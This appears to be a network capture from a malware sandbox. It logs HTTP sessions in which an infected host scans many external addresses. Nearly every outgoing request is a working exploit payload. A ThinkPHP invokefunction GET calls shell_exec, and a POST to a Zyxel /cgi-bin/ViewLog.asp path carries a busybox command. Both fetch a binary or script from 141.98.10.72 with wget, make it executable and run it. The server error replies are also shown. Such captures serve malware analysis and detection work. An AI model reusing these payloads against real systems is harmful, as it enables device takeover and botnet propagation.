                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 66 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 36 26 23 34 36 3b 32 64 33 31 65 61 31 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9fa571d4&#46;1707899296&#46;2d31ea1e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            201192.168.2.235048895.164.254.5480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.654187918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:16.773288965 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            202192.168.2.233897095.100.150.13080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.745394945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:16.955626965 CET477INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 255
                                                            Expires: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 64 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 36 26 23 34 36 3b 31 31 32 61 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1da571d4&#46;1707899296&#46;112a5</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            203192.168.2.234314295.168.237.1480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.760945082 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            204192.168.2.233592688.221.159.8280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.906121969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:17.066776991 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:16 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 36 26 23 34 36 3b 33 63 61 37 31 33 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;974ddb17&#46;1707899296&#46;3ca7135</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            205192.168.2.234472088.99.239.1880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:16.951107025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:17.177407980 CET59INHTTP/1.1 400 Bad Request
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            206192.168.2.235852831.120.216.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.502835035 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:17.703186035 CET224INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 106
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
                                                            Feb 14, 2024 09:28:18.299196959 CET224INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 106
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            207192.168.2.233344831.201.254.1928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.521473885 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:17.739286900 CET369INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:28:17 GMT
                                                            Connection: Close
                                                            Cache-Control: no-store
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: DENY
                                                            Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.ookla2.ictvanloon.nl *.speedtestcustom.com


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            208192.168.2.235470294.122.121.1978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.552887917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            209192.168.2.234420495.86.76.2508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.561553001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            210192.168.2.233589062.33.133.1628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.633686066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:17.960926056 CET351INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.0.15
                                                            Date: Wed, 14 Feb 2024 08:28:17 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            211192.168.2.233850294.122.64.2028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.810936928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            212192.168.2.234136894.121.193.2378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.810969114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            213192.168.2.233672294.122.107.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.810991049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            214192.168.2.234508694.122.51.698080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.811053038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            215192.168.2.235112295.86.96.1668080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.813884020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            216192.168.2.235169862.79.19.848080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.816055059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            217192.168.2.234388031.136.137.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:17.961175919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:18.656785965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:20.000574112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:22.720213890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.095458031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:38.845927000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
